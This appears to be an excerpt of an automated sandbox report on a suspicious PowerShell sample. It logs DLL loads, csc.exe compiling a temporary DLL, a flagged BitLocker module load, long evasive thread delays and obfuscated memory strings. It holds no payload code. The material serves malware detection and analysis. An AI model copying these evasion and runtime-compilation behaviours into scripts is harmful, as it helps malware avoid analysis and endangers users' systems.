    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B2B00BD pushad ; iretd 1_2_00007FFB4B2B00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B2B7510 push ebx; iretd 1_2_00007FFB4B2B756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B2B7967 push ebx; retf 1_2_00007FFB4B2B796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B38240C push 8B485F92h; iretd 1_2_00007FFB4B382411
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3942Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5889Jump to behavior
    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 432Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504Thread sleep time: -12912720851596678s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wVmBbPiVATyasIgjQjvfmfvuAnfHkvJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugq
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
    Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wLQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkjrVNZCVmNFGWhVNVupZyyqeZtEZyxZ
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJOBpmdzoZjnRnWfyHnVjaKMQWHsPjI
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
    Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQzOmglXXQHFPyauAwvDwtHuSIRjlXQ
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugqXQRedYRFvuAtZEVqXkhAeegnlexqk
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWB
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJ
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wOUvvTqgTtRYFDzucovGCaOAHYsfcAWjUbHnIyOippScsatHdEtoFQMEZQVTeCXISgeBCCELijddizqGSrHpdPbUFWQvCsbicoFBBevMciLqnDXZPTJDpnsY
    Source: powershell.exe, 00000001.00000002.2477577291.000002507955B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWBTMcJjWMqwkXVNbDYdRxsPxEboTamj
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDtqAzDiuijcpCRkHSBbAiJWNFdJQWoqUGAWKPgQcQjzdzr
    Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNrZTTYdXHYgtyFaBoOjepDzzkBAGWAtRGAHrPbcljfmvLV
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wJjVemwrdrdzGJxhtAqtdUOBpIDLrALQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkj
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wJbglpYmoYIwASoKyXGRoKcihJXQBvgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQ
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
